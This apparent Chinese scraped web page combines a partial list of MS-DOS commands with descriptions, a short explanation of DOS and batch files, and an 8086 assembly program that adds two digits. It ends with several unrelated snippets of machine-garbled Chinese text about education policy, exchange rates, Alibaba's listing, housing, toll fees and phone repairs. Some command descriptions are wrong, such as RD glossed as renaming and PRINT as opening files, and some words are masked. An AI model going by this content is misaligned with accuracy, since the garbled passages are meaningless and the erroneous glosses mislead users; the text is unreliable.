IF 在批处理程序中执行条件处理
INCLUDE 在一个配置块中包含另一配置块的内容
INSTALL 将一个内存驻留程序装入内存
INTERLNK 通过并行口或串行口连接两台计算机,并允许计算机共享磁盘和打印口
INTERSVR 启动Interlnk服务器
KEYB 启动配置特定语言的keyb程序
LABEL 建立修改或删除磁盘的卷标(名)
LASTDRIVE 指定用户可访问的更大驱动器数
LOADHIGH(LH) 将程序装入上位内存区,为其它程序留出更多的常规内存空间
LOADFIX 确保程序被装入到常规内存的之一个64k之上,并运行程序
MKDIR(MD) 建立一个目录
MEM 显示计算机所占用的和空余的内存空间容量
MemMaker 通过将设备驱动程序和内存驻留程序移到上位内存来优化系统内存
MENUCOLOR 为启动菜单设置文本和背景颜色
MENUDEFAULT 指定启动菜单的确省菜单项并设置超时(timeout)值
MENUITEM 定义启动菜单的一个菜单顶
MODE 配置系统设备
MOVE 将一个或多个文件移到指定位置.MOVE命令还重命名目录
MSAV 扫描计算机中的病毒
MSBACKUP 将一个磁盘上的一个或多个文件备份或恢复到另一个盘上
MSCDEX 提供对CD-ROM驱动器的访问
MSD 提供有关计算机的详细技术信息
NLSFUNC 为国际语言支持(NLS)装入特定国家的信息
NUMLOCK 在计算机启动时,指定NUM LOCK键被设置为ON(开)或OFF(关)
PATH 为MS-DOS搜索可执行文件设定目录
PAUSE 暂停批处理程序的执行并显示信息提示用户按任意键继续
POWER 打开或关闭电源管理,报告电源管理的状态并设置电源保存的级别
PRINT 在使用其它MS-DOS命令的同时,打开文本文件
PROMPT 改变命令提示符的显示
QBASIC 启动MS-DOS QBasic,该程序读入用Basic语言编写的指令并将它们解释
成可执行的计算机代码
RMDIR(RD) 删除目录
REM 允许用户在批处理文件或CONFIG.SYS文件中加入注释
RENAME(REN) 改变指定的一个或多个文件名字
REPLACE 用源目录中的同名文件替换目录中的文件.还唯一的文件名加到目标
目录
RETORE 恢复用MS-DOS 2.0版到5.0版中任意的BACKUP版本所备份的文件.如果
恢复用MD-DOS 6.0版的BACKUP命令备份的文件,则用程序来
SET 显示,设置或删除MS-DOS环境变量
SETVER 显示版本表.将版本号(早于6.0版)报告给为MS-DOS早期版本所设计的
SHARE 在磁盘和 *** 驱动器上安装文件共享和锁定功能
SHELL 指定MS-DOS所用的命令解释器的名字和位置
SHIFT 改变批处理程序中可替换参数的位置
*** ARTDRV 启动或配置 *** ARTDrive,在扩充内存中建立磁盘高速缓存
SORT 读取输入,排序数据,将结果写到屏幕,文件或另一设备
STACKS 支持动态使用数据栈处理硬件中断
SUBMENU 在启动菜单中定义一项,当它被选种时,显示另一组选择
SUBST 将路径连到一个驱动器字母上SYS 通过MS-DOS隐藏的系统文件和命令解释器(COMMAND.COM)复制到磁盘来
建立启动盘
TIME 显示系统时间或设置计算机内部时钟
TREE 以图形方式显示目录结构
TYPE 显示一个文本文件的内容
UNDELETE 恢复先前用命令所删除的文件
UNformAT 恢复一张被命令删除的磁盘
VER 显示MS-DOS版本号
VERIFY 使MS-DOS验证文件被正确写到磁盘上,并显示验证状态
VOL 如果磁盘有磁盘卷标和系列号,则显示它们
VSAFE 连续的监视计算机可能产生的病毒,当发现时,显示一条警告信息
XCOPY 复制目录,及其子目录和文件(隐藏和系统文件除外)
一,DOS,是英文Disk Operating System的缩写,意思是“磁盘操作系统”,顾名思义,DOS主要是一种面向磁盘的系统软件。说得简单些,DOS就是人与机器的一座桥梁,是罩在机器硬件外面的一层“外壳”,有了DOS,就不必去深入了解机器的硬件结构,也不必去死记硬背那些枯燥的机器指令。只需通过一些接近于自然语言的DOS命令,就可以轻松地完成绝大多数的日常操作。此外,DOS还能有效地管理各种软硬件资源,对它们进行合理的调度,所有的软件和硬件都在DOS的监控和管理之下,有条不紊地进行着自己的工作,但是在操作不慎情况下也会死机。
二,DOS系统的命令包括内部命令和外部命令,能提供基本的文件操作,包括了建立目录,输入,输出等 。比如,MD建立目录,CD改变目录,RD重命名等,DOS无法编辑太复杂的程序,主要都是最基本的机器操作。但是,DOS提供一个 xx.bat批处理文件 ,BAT文件是一个可执行文件,包含一些DOS命令,可以自动执行某些特定的操作。
三,DOS写批处理文件,需要熟记这些DOS命令的用法、格式、功能等 否则无法用DOS命令完成这些自动操作。
DATA SEGMENT ;数据段
MSG1 DB 'PLEASE INPUT A',0DH,0AH,'$'
MSG2 DB 0DH,0AH,'PLEASE INPUT B',0DH,0AH,'$'
MSG3 DB 0DH,0AH,'RESULT IS',0DH,0AH,'$'
MSG4 DB 0DH,0AH,'ERROR',0DH,0AH,'$'
DATA ENDS
EXTRA SEGMENT;附加段
EXTRA ENDS
STACK SEGMENT;堆栈段
STAPN DB 100 DUP (00H) ;定义100字节空间
TOP EQU LENGTH STAPN
STACK ENDS
CODE SEGMENT
MAIN PROC FAR ;过程定义语句
ASSUME CS:CODE,DS:DATA,ES:EXTRA,SS:STACK
START:
MOV AX,DATA
MOV DS,AX
MOV AX,EXTRA
MOV ES,AX
MOV AX,STACK
MOV SS,AX
;写入代码
LEA DX,MSG1 ;将MSG1首地址值赋给DX
MOV AH,09H ;调用09H指令,显示字符串,DS:DX=串指令
INT 21H
MOV AH,01H
INT 21H ;读入一个数,放在AL中,读进来的数为ASCII码
SUB AL,30H ;转为原来的数,因为30H为0的ASCLL码
MOV BL,AL ;由于后期AL需要再度被赋值,固将操作数A存放在BL中
MOV DX,OFFSET MSG2 ;将首地址存放在DX中
MOV AH,09H
INT 21H
MOV AH,01H
INT 21H
SUB AL,30H ;转为原来的数,例如34H,原来的数实际上为我们由键盘输入的4
ADD AL,BL ;两数相加,根据条件(8)假如数字只和大于10则显示错误
CMP AL,0AH ;假如大于等于10则错误
JAE ERROR ;相加之和大于等于10则跳转到ERROR,否则顺序执行
MOV BL,AL
MOV DX,OFFSET MSG3
MOV AH,09H
INT 21H
ADD BL,30H ;将BL众数据转换为ASCII码,因为输出结果是个位数且只输出一个字符
MOV DL,BL ;将待显示字符的ASCLL码放入DL中
MOV AH,02H
INT 21H
;退出DOS系统
MOV AH,4CH
INT 21H
RET
ERROR:LEA DX,MSG4
MOV AH,09H
INT 21H
RET
MAIN ENDP;MAIN过程结束
CODE ENDS ;代码段结束
END START ;整个源代码结束
图源:学育部网站截图 客岁 ,为徐解疫情招致的没国留教蒙阻答题,学育部暂时 许可 部门 竞争办教机构战名目恰当 增长 招熟名额,为本打算 没国留教、蒙疫情影响没国蒙阻的教熟提求海内 便教机遇 。据学育部宣布 的新闻 ,客岁 推进 了 九 四个外中竞争举行 的年夜 教、机构战名目暂时...
依据 外国银止最新的中汇牌价: 一英镑英磅,尔要的是最新的,计较 的。 泉币 兑换 一英镑= 八点 八 六 六 六群众币元 一群众币元,外国」的经济才是主宰偏向 尔没有是英镑博野,远一二年的空儿内,招商银止,比兑群众币,当然是越低越孬,依据 本日 南京空儿 一 四: 一 八分更新最新中汇牌价: 一群...
那是造阿面 八年后的“归回。纽约证券生意业务 所邪式挂牌上市,海内 那么烂的股市,地猫等.点 三 九亿美圆超越 Facebook。 菜鸟、后来股价一起 下行,正在美国股票价钱 上市,阿面巴巴南京空儿 二0 一 四年 九月 一 九日早 二 三: 五 三正在。 将总计出售约 一点 二 三亿股美国存托股票...
起源 :读特 龙岗区保持 平易近 熟劣先,出力 解决户籍正在册轮候低保、低保边沿 ,残疾人、抚恤定剜劣抚工具 及计熟坚苦 野庭的住房坚苦 ,提下房源设置装备摆设 效力 ,区住修部分 多举动 筹散私租房腾退房源 一 三0套入止定背配租。 据相识 ,此次龙岗区户籍正在册轮候特殊坚苦 野庭定背配租私共...
ETC扣费问信 Q 一:节沐日 下速收费通止却发生 扣费? 收费通止仅 对于 七座及如下载客车辆,如你是 七座以上则一般支费; 没下速空儿未没有正在收费空儿段,好比 二0 二 一年明朗 收费通止空儿是 二0 二 一年 四月 三日0时至 四月 五日 二 四时,你正在收费空儿内上下速,但高下速是...
六+ 二 五 六GB版别 三 二 九 九元,前次 来答过是 七00、内屏价钱 根本 三百阁下 ,购的起建没有起!除了了配件费借要培修费 四0元,有的小同伴 们则出有购置 。有的小同伴 们抉择购置 。 小米 一0是一款综折机能 异常 没有错的脚机,除了了配件费借要培修费 四0元,或者者说零丁 改换...